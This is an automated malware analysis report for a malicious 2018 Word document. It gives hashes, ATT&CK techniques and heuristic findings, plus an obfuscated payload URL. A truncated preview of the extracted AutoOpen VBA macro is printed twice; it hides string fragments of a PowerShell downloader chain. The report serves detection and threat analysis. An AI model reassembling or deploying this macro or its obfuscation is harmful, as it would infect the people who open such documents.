Office (OLE) malware analysis — malicious · f3a6cc1e353b0945

MALICIOUS

Office (OLE)

87.0 KB Created: 2018-02-15 23:07:00 Authoring application: Microsoft Office Word First seen: 2018-02-19

MD5: 94fa83e77fa7d73894bd6389d3139c58 SHA-1: 0b0575a2cca3fd074bbd4b27d3b86d0e5fd47f6b SHA-256: f3a6cc1e353b09458055a00419d108e891aed064344f3a3d2719af9dcd6bd9fd

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The sample contains a VBA macro with an AutoOpen function that utilizes the Shell() command. This indicates an attempt to execute arbitrary code, likely to download and run a secondary payload from the provided URL. The obfuscated nature of the script prevents a more detailed analysis of its exact actions.

Heuristics 6

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://semiovi0Dq+0Dq.es/djt1nD+1nDJk0Dq+0Dqr In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 21500 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	21500 bytes
SHA-256: `b587e6ddce94e883889248d675e1aaaf79ed55ed2da0c2a47c7e028e32c2c18e`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "REInJfDWPYNBaV" Function TLFjGXMVpvIXqw() On Error Resume Next XCbdaIbFn = 6872919 / CLng(TvzfudjXjOK) - 6256923 * Cos(6810925) + OjcpsPSwGBJVq + 7298287 skvrianSIo = 9013910 / CLng(dzhiMrcrL) - 1911548 * Cos(9229380) + zJnUm + 2623635 rpkvKzrTrpP = 782297 / CLng(viTUM) - 4111202 * Cos(7971175) + VZnucHlMwAiWDk + 5776988 DpoqfQJwjO = (ccfXwBWISiXYL) + HJjkJKD("jliaKUtROwwpvnpFfLQoPDR1nD+'+'1nD]3'+'6 -CrEPlAce([ChaR]1nD+1nD71+[Ch1nD+1nD2Qk+2Qk'+'aR]78+[ChaR]84)2Qk+2Qk,[CwwKPjfrrTHVj", 23, 89) IRszjiobqj = 4241016 / CLng(fhwKElBwWsjj) - 8264456 * Cos(2079125) + kdqildr + 3937854 DRiviURrzMq = 4376708 / CLng(rLRmHYo) - 3663824 * Cos(9329844) + AtSptLYUJApvLp + 8316985 bmpiAk = 2667869 / CLng(skInMbwMZkL) - 2829911 * Cos(3901934) + NuNLqLAoZFWKW + 4736242 nOdhc = (iNWqChWmWBbrYa) + HJjkJKD("fWwpQfsCwSwPNtitqdLdVziLuHjwVVFbAR]98+[cHAR]102+[cHAR]97),'$').rEPLace(([cHAR]50+[cHAR]81+[cHAR]107),[striNg][cHAR]39)\|iNVOke-EXPREsSIoNbIwTpjd", 33, 104) PriBHoi = 693750 / CLng(DQCFXPZ) - 1550105 * Cos(3103869) + iwfGDYYoX + 3919701 mMCaT = 9574709 / CLng(RVOwwBwuqIsXk) - 8630501 * Cos(7202854) + wNvTzkL + 2082137 nRmGElitM = 9429009 / CLng(uFcNKjNLzjqbT) - 4492152 * Cos(1862576) + iVEHVLmLq + 1952687 SXrbzRwVu = (NFpHcAwdACh) + HJjkJKD("jlCmPoaYouY9-CrEPlAce ([ChaR]122+[Cha2Qk+2QkR]731nD+1nD+[ChaR'+']97),[ChaR]92) Iwx&2Qk+2Qk((VariaBLE 0DqMdR0Dq).NamE[3,11nD+1nD2Qk+2Qk1,2]-jOIn0Dq0Dq)1nD).rEhDFhMsXYjnspost", 12, 148) QTHjYpaVJTS = 8766061 / CLng(KbGpGpYjS) - 3152337 * Cos(4437744) + JjQTWmbRPQDBXv + 9475361 dnwBuzrvhis = 9252122 / CLng(hpUQBTTZ) - 3994582 * Cos(9564872) + dYaCFw + 9818433 SEffMQ = 5221910 / CLng(aijubH) - 8759569 * Cos(4717011) + SKscR + 6999069 zbJTPiVa = (cwIKZtEWW) + HJjkJKD("fJWz2Qk+ 0Dq+2Qk+2Qk0Dqt0IzIat0I + RFrN0Dq+0DqS0Dq+0DqB0Dq+0Dq 0Dq+0Dq+ (0Dq+0Dqt'+'0I.ex0Dq+0Dqt0I+t0Iet0I);for0Dq+01nD+1nDDqe0Dq'+'+0Dqa2Qk+2Qkch(RFr0Dq+1nD+1nNXnpOwFGYfjYiUjUY", 5, 157) uZcUoFXE = 5073012 / CLng(UCnRAGqbCPqLMj) - 6446202 * Cos(8944966) + nQDXJtNWpZ + 7174653 rqYMvPpb = 3937137 / CLng(uOoCYzBAnk) - 9865969 * Cos(4912238) + JFKaLRLwBdWXK + 1583853 SZOwcHJzOC = 4841017 / CLng(LjFGZUbXKIiscz) - 6058782 * Cos(870048) + RkILOOTIhtlSiN + 8245571 iQCiTkqimst = (pAvYwWnrzGZot) + HJjkJKD("zoHtQq}}0Dq)-REp2Qk+2QklA2Qk+2QkcE 0DqRFr0Dq,[Cha1nD+1nDjDGCFvIcDwAkiwrOLPowzhahiPCzAoRpq", 6, 51) hfdqjWHEVt = 8798546 / CLng(RjwSlwrbq) - 916465 * Cos(6018019) + rQYWbKfzviYzL + 7035002 zoMFDuc = 8033836 / CLng(qnAFTTL) - 3900763 * Cos(6255311) + IUbNnilIrCvf + 4265356 OAfToZ = 1479953 / CLng(vcmLwGAIikCEZ) - 5089569 * Cos(4688184) + EpqBK + 4267481 LhzcIKtjbYa = (jSTCzSZ) + HJjkJKD("QGCqYzKXLWmjUFf('.( bfaeNV:coMSpec[4,26,25]-JOin2Qk2Qk) ( (2Qk&'+'( Rb3SHELlID[1]+Rb3sHELlid[13]+1nDx1nD)((1nD ((0D2Qk+2QkqRF0D'+'q+0Dqrnsadasd 0Dq+0Dq= &(t0Int0I+t'+'0Iet01nD+1oXCl", 16, 162) tnwMRGBcZE = 5744704 / CLng(iTwqpjG) - 6702491 * Cos(4954591) + wUmDHVLZlLNCh + 6166286 rRHtTITkUYj = 9072800 / CLng(KtwYEG) - 2401401 * Cos(117166) + ZobVlmcw + 9327385 hplwR = 5470713 / CLng(wbAqlEwRzflS) - 9191867 * Cos(6538245) + MkAppIlii + 6266086 LzbAlijZZ = (qYJifIMzdk) + HJjkJKD("rMrwnbAhaR]34 -CrEPlAce([C'+'haR]1071nD+1nD+[ChaR]104+[Ch2Qk+2QkaR]56),[ChaR]962Qk+2Qk-RE'+'plAc'+'E1nD+1nD 0Dqt0I0Dq,[ChaR'+'2Qk+2Qk]3Ewp", 8, 128) JNFXSM = 1263638 / CLng(fKsSKBAwsMbA) - 2781995 * Cos(7843761) + lTbNpiNit + 8889702 zvGSTRB = 1893041 / CLng(QkzsH) - 5842586 * Cos(3262638) + BqbwmAICpN + 7512065 hZtEBpkm = 1591064 / CLng(RiGQjQERbwXAw) - 6899537 * Cos(2747123) + UUWzNUusdbpZL + 8602547 FcrlaJnm = (AHuCpnWfnQZsz) + HJjkJKD("NXXiSzLXmoRAOwijfq);2Qk+2Qk&(2Qk+2Qkt0D'+'q+0D'+'2Qk+2Q'+'kq00Dq+0Dq1nD+ntdZwKRfwwuTtiRbMHfwpj", 18, 55) nUvRnQzZR = 2071707 / CLng(wjOnIbiGjS) - 3206985 * Cos(9751071) + kIztwJkEvCo + 6187063 TnTWA = 7193568 / CLng(iCXmq ... (truncated)

SHA-256: b587e6ddce94e883889248d675e1aaaf79ed55ed2da0c2a47c7e028e32c2c18e

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "REInJfDWPYNBaV"
Function TLFjGXMVpvIXqw()
On Error Resume Next
XCbdaIbFn = 6872919 / CLng(TvzfudjXjOK) - 6256923 * Cos(6810925) + OjcpsPSwGBJVq + 7298287
skvrianSIo = 9013910 / CLng(dzhiMrcrL) - 1911548 * Cos(9229380) + zJnUm + 2623635
rpkvKzrTrpP = 782297 / CLng(viTUM) - 4111202 * Cos(7971175) + VZnucHlMwAiWDk + 5776988
DpoqfQJwjO = (ccfXwBWISiXYL) + HJjkJKD("jliaKUtROwwpvnpFfLQoPDR1nD+'+'1nD]3'+'6 -CrEPlAce([ChaR]1nD+1nD71+[Ch1nD+1nD2Qk+2Qk'+'aR]78+[ChaR]84)2Qk+2Qk,[CwwKPjfrrTHVj", 23, 89)
IRszjiobqj = 4241016 / CLng(fhwKElBwWsjj) - 8264456 * Cos(2079125) + kdqildr + 3937854
DRiviURrzMq = 4376708 / CLng(rLRmHYo) - 3663824 * Cos(9329844) + AtSptLYUJApvLp + 8316985
bmpiAk = 2667869 / CLng(skInMbwMZkL) - 2829911 * Cos(3901934) + NuNLqLAoZFWKW + 4736242
nOdhc = (iNWqChWmWBbrYa) + HJjkJKD("fWwpQfsCwSwPNtitqdLdVziLuHjwVVFbAR]98+[cHAR]102+[cHAR]97),'$').rEPLace(([cHAR]50+[cHAR]81+[cHAR]107),[striNg][cHAR]39)|iNVOke-EXPREsSIoNbIwTpjd", 33, 104)
PriBHoi = 693750 / CLng(DQCFXPZ) - 1550105 * Cos(3103869) + iwfGDYYoX + 3919701
mMCaT = 9574709 / CLng(RVOwwBwuqIsXk) - 8630501 * Cos(7202854) + wNvTzkL + 2082137
nRmGElitM = 9429009 / CLng(uFcNKjNLzjqbT) - 4492152 * Cos(1862576) + iVEHVLmLq + 1952687
SXrbzRwVu = (NFpHcAwdACh) + HJjkJKD("jlCmPoaYouY9-CrEPlAce ([ChaR]122+[Cha2Qk+2QkR]731nD+1nD+[ChaR'+']97),[ChaR]92) Iwx&2Qk+2Qk((VariaBLE 0Dq*MdR*0Dq).NamE[3,11nD+1nD2Qk+2Qk1,2]-jOIn0Dq0Dq)1nD).rEhDFhMsXYjnspost", 12, 148)
QTHjYpaVJTS = 8766061 / CLng(KbGpGpYjS) - 3152337 * Cos(4437744) + JjQTWmbRPQDBXv + 9475361
dnwBuzrvhis = 9252122 / CLng(hpUQBTTZ) - 3994582 * Cos(9564872) + dYaCFw + 9818433
SEffMQ = 5221910 / CLng(aijubH) - 8759569 * Cos(4717011) + SKscR + 6999069
zbJTPiVa = (cwIKZtEWW) + HJjkJKD("fJWz2Qk+ 0Dq+2Qk+2Qk0Dqt0IzIat0I + RFrN0Dq+0DqS0Dq+0DqB0Dq+0Dq 0Dq+0Dq+ (0Dq+0Dqt'+'0I.ex0Dq+0Dqt0I+t0Iet0I);for0Dq+01nD+1nDDqe0Dq'+'+0Dqa2Qk+2Qkch(RFr0Dq+1nD+1nNXnpOwFGYfjYiUjUY", 5, 157)
uZcUoFXE = 5073012 / CLng(UCnRAGqbCPqLMj) - 6446202 * Cos(8944966) + nQDXJtNWpZ + 7174653
rqYMvPpb = 3937137 / CLng(uOoCYzBAnk) - 9865969 * Cos(4912238) + JFKaLRLwBdWXK + 1583853
SZOwcHJzOC = 4841017 / CLng(LjFGZUbXKIiscz) - 6058782 * Cos(870048) + RkILOOTIhtlSiN + 8245571
iQCiTkqimst = (pAvYwWnrzGZot) + HJjkJKD("zoHtQq}}0Dq)-REp2Qk+2QklA2Qk+2QkcE 0DqRFr0Dq,[Cha1nD+1nDjDGCFvIcDwAkiwrOLPowzhahiPCzAoRpq", 6, 51)
hfdqjWHEVt = 8798546 / CLng(RjwSlwrbq) - 916465 * Cos(6018019) + rQYWbKfzviYzL + 7035002
zoMFDuc = 8033836 / CLng(qnAFTTL) - 3900763 * Cos(6255311) + IUbNnilIrCvf + 4265356
OAfToZ = 1479953 / CLng(vcmLwGAIikCEZ) - 5089569 * Cos(4688184) + EpqBK + 4267481
LhzcIKtjbYa = (jSTCzSZ) + HJjkJKD("QGCqYzKXLWmjUFf('.( bfaeNV:coMSpec[4,26,25]-JOin2Qk2Qk) ( (2Qk&'+'( Rb3SHELlID[1]+Rb3sHELlid[13]+1nDx1nD)((1nD ((0D2Qk+2QkqRF0D'+'q+0Dqrnsadasd 0Dq+0Dq= &(t0Int0I+t'+'0Iet01nD+1oXCl", 16, 162)
tnwMRGBcZE = 5744704 / CLng(iTwqpjG) - 6702491 * Cos(4954591) + wUmDHVLZlLNCh + 6166286
rRHtTITkUYj = 9072800 / CLng(KtwYEG) - 2401401 * Cos(117166) + ZobVlmcw + 9327385
hplwR = 5470713 / CLng(wbAqlEwRzflS) - 9191867 * Cos(6538245) + MkAppIlii + 6266086
LzbAlijZZ = (qYJifIMzdk) + HJjkJKD("rMrwnbAhaR]34 -CrEPlAce([C'+'haR]1071nD+1nD+[ChaR]104+[Ch2Qk+2QkaR]56),[ChaR]962Qk+2Qk-RE'+'plAc'+'E1nD+1nD 0Dqt0I0Dq,[ChaR'+'2Qk+2Qk]3Ewp", 8, 128)
JNFXSM = 1263638 / CLng(fKsSKBAwsMbA) - 2781995 * Cos(7843761) + lTbNpiNit + 8889702
zvGSTRB = 1893041 / CLng(QkzsH) - 5842586 * Cos(3262638) + BqbwmAICpN + 7512065
hZtEBpkm = 1591064 / CLng(RiGQjQERbwXAw) - 6899537 * Cos(2747123) + UUWzNUusdbpZL + 8602547
FcrlaJnm = (AHuCpnWfnQZsz) + HJjkJKD("NXXiSzLXmoRAOwijfq);2Qk+2Qk&(2Qk+2Qkt0D'+'q+0D'+'2Qk+2Q'+'kq00Dq+0Dq1nD+ntdZwKRfwwuTtiRbMHfwpj", 18, 55)
nUvRnQzZR = 2071707 / CLng(wjOnIbiGjS) - 3206985 * Cos(9751071) + kIztwJkEvCo + 6187063
TnTWA = 7193568 / CLng(iCXmq
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.